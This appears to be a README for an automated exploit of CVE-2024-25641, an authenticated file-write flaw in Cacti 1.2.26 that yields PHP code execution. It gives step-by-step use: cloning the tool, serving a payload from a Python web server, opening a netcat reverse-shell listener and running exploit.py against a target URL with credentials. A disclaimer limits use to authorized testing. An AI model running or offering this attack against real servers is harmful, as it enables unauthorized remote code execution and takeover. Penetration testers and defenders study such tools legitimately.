Fully automated exploit for CVE-2024-25641. When a user is authenticated, Cacti version 1.2.26 is vulnerable to an arbitrary file write vulnerability, exploitable through the "Package Import" feature, allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server (RCE).
Credits to this PoC : https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88 (I have simply automated this to gain a foothold.)
This tool is intended for educational and testing purposes only. The author of this tool is not responsible for any misuse or illegal activities performed with it. Use this tool only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal and unethical.
# Clone the repository
git clone https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26.git
cd CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26
# Setup Python web server
python -m http.server <PYTHON_WEB_SERVER_PORT>
# Setup netcat listener
nc -lvnp <LOCAL_PORT>
# Run the tool
pip install -r requirements.txt (if needed)
python exploit.py -L <LOCAL_IP> -lp <LOCAL_PORT> -wp <PYTHON_WEB_SERVER_PORT> -url <URL> -u <USER> -p <PASS>You can also check this out : CVE-2024-25641 PoC